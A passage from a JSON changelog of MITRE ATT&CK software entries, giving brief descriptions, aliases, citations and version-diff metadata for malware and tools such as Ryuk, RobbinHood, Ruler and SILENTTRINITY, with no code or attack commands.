Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RemoteUtilities" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:11.980000+00:00\", \"old_value\": \"2025-04-16 20:38:49.636000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0a607c53-df52-45da-a75d-0e53df4dad5f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-29 14:27:18.204000+00:00", + "modified": "2025-04-25 14:42:38.861000+00:00", + "name": "RobbinHood", + "description": "[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0400", + "external_id": "S0400" + }, + { + "source_name": "CarbonBlack RobbinHood May 2019", + "description": "Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. 
Retrieved July 29, 2019.", + "url": "https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/" + }, + { + "source_name": "BaltimoreSun RobbinHood May 2019", + "description": "Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.", + "url": "https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RobbinHood" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:38.861000+00:00\", \"old_value\": \"2025-04-16 20:37:54.940000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6b616fc1-1505-48e3-8b2c-0d19337bff38", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:58.226000+00:00", + "modified": "2025-04-25 14:43:40.835000+00:00", + "name": "Rover", + "description": "[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0090", + "external_id": "S0090" + }, + { + "source_name": "Palo Alto Rover", + "description": "Ray, V., Hayashi, K. (2016, February 29). 
New Malware \u2018Rover\u2019 Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Rover" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:40.835000+00:00\", \"old_value\": \"2025-04-16 20:38:15.344000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-02-04 18:27:00.501000+00:00", + "modified": "2025-04-25 14:45:22.953000+00:00", + "name": "Ruler", + "description": "[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0358", + "external_id": "S0358" + }, + { + "source_name": "SensePost Ruler GitHub", + "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. 
Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/ruler" + }, + { + "source_name": "SensePost NotRuler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", + "url": "https://github.com/sensepost/notruler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ruler" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office Suite" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:22.953000+00:00\", \"old_value\": \"2025-04-16 20:38:53.872000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:33.592000+00:00", + "name": "RunningRAT", + "description": "[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). 
(Citation: McAfee Gold Dragon)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0253", + "external_id": "S0253" + }, + { + "source_name": "RunningRAT", + "description": "(Citation: McAfee Gold Dragon)" + }, + { + "source_name": "McAfee Gold Dragon", + "description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RunningRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:33.592000+00:00\", \"old_value\": \"2025-04-16 20:38:12.728000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-13 20:14:53.171000+00:00", + "modified": "2025-04-22 22:21:23.589000+00:00", + "name": "Ryuk", + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. 
[Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0446", + "external_id": "S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. 
Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Insurance Group", + "The DFIR Report" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:21:23.589000+00:00\", \"old_value\": \"2025-04-16 20:38:27.373000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][1]\": \"The DFIR Report\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][0]\": \"The DFIR Report, @TheDFIRReport\"}}", + "previous_version": "1.4" + }, + { + "type": "tool", + "id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:30.257000+00:00", + "name": "SDelete", + "description": "[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0195", + "external_id": "S0195" + }, + { + "source_name": "SDelete", + "description": "(Citation: Microsoft SDelete July 2016)" + }, + { + "source_name": "Microsoft SDelete July 2016", + "description": "Russinovich, M. (2016, July 4). SDelete v2.0. 
Retrieved February 8, 2018.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SDelete" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:30.257000+00:00\", \"old_value\": \"2025-04-16 20:38:56.799000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--0998045d-f96e-4284-95ce-3c8219707486", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:37.580000+00:00", + "name": "SEASHARPEE", + "description": "[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0185", + "external_id": "S0185" + }, + { + "source_name": "SEASHARPEE", + "description": "(Citation: FireEye APT34 Webinar Dec 2017)" + }, + { + "source_name": "FireEye APT34 Webinar Dec 2017", + "description": "Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. 
Retrieved December 20, 2017.", + "url": "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SEASHARPEE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:37.580000+00:00\", \"old_value\": \"2025-04-16 20:37:54.263000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--58adaaa8-f1e8-4606-9a08-422e568461eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:42.754000+00:00", + "modified": "2025-04-25 14:43:25.821000+00:00", + "name": "SHOTPUT", + "description": "[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0063", + "external_id": "S0063" + }, + { + "source_name": "Backdoor.APT.CookieCutter", + "description": "(Citation: FireEye Clandestine Fox Part 2)" + }, + { + "source_name": "Pirpi", + "description": "(Citation: FireEye Clandestine Fox Part 2)" + }, + { + "source_name": "FireEye Clandestine Wolf", + "description": "Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf \u2013 Adobe Flash Zero-Day in APT3 Phishing Campaign. 
Retrieved January 14, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" + }, + { + "source_name": "FireEye Clandestine Fox Part 2", + "description": "Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SHOTPUT", + "Backdoor.APT.CookieCutter", + "Pirpi" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:25.821000+00:00\", \"old_value\": \"2025-04-16 20:38:09.918000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--1244e058-fa10-48cb-b484-0bcf671107ae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-03-23 19:34:30.486000+00:00", + "modified": "2025-04-30 13:26:45.728000+00:00", + "name": "SILENTTRINITY", + "description": "[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. 
[SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0692", + "external_id": "S0692" + }, + { + "source_name": "SILENTTRINITY", + "description": "(Citation: GitHub SILENTTRINITY March 2022)" + }, + { + "source_name": "Security Affairs SILENTTRINITY July 2019", + "description": "Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.", + "url": "https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html" + }, + { + "source_name": "GitHub SILENTTRINITY March 2022", + "description": "Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.", + "url": "https://github.com/byt3bl33d3r/SILENTTRINITY" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SILENTTRINITY" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniel Acevedo, ARMADO" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-30 13:26:45.728000+00:00\", \"old_value\": \"2024-09-23 14:18:53.140000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Daniel Acevedo, ARMADO\", \"old_value\": \"Daniel Acevedo, Blackbot\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--3240cbe4-c550-443b-aa76-cc2a7058b870", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:42:59.423000+00:00", + "name": "SNUGRIDE", + "description": "[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0159", + "external_id": "S0159" + }, + { + "source_name": "SNUGRIDE", + "description": "(Citation: FireEye APT10 April 2017)" + }, + { + "source_name": "FireEye APT10 April 2017", + "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SNUGRIDE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:59.423000+00:00\", \"old_value\": \"2025-04-16 20:38:01.282000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9ca488bd-9587-48ef-b923-1743523e63b2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:44:12.545000+00:00", + "name": "SOUNDBITE", + "description": 
"[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0157", + "external_id": "S0157" + }, + { + "source_name": "SOUNDBITE", + "description": "(Citation: FireEye APT32 May 2017)" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SOUNDBITE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:12.545000+00:00\", \"old_value\": \"2025-04-16 20:38:26.524000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--67e6d66b-1b82-4699-b47a-e2efb6268d14", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:37.767000+00:00", + "modified": "2025-04-25 14:43:37.740000+00:00", + "name": "SeaDuke", + "description": "[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. 
It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0053", + "external_id": "S0053" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SeaDuke", + "SeaDaddy", + "SeaDesk" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:37.740000+00:00\", \"old_value\": \"2025-04-16 20:38:13.890000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f931a0b9-0361-4b1b-bacf-955062c35746", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-13 14:57:39.387000+00:00", + "modified": "2025-04-25 14:45:07.890000+00:00", + "name": "Seth-Locker", + "description": "[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021.\n(Citation: Trend Micro Ransomware February 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/software/S0639", + "external_id": "S0639" + }, + { + "source_name": "Trend Micro Ransomware February 2021", + "description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Seth-Locker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:07.890000+00:00\", \"old_value\": \"2025-04-16 20:38:44.630000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-22 17:02:52.954000+00:00", + "modified": "2025-04-25 14:42:40.376000+00:00", + "name": "SharpStage", + "description": "[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0546", + "external_id": "S0546" + }, + { + "source_name": "SharpStage", + "description": "(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "description": "Cybereason Nocturnus Team. 
(2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + }, + { + "source_name": "BleepingComputer Molerats Dec 2020", + "description": "Ilascu, I. (2020, December 14). Hacking group\u2019s new malware abuses Google and Facebook services. Retrieved December 28, 2020.", + "url": "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SharpStage" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:40.376000+00:00\", \"old_value\": \"2025-04-16 20:37:55.445000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5763217a-05b6-4edd-9bca-057e47b5e403", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-12 21:28:20.934000+00:00", + "modified": "2025-04-25 14:43:24.555000+00:00", + "name": "ShimRat", + "description": "[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. 
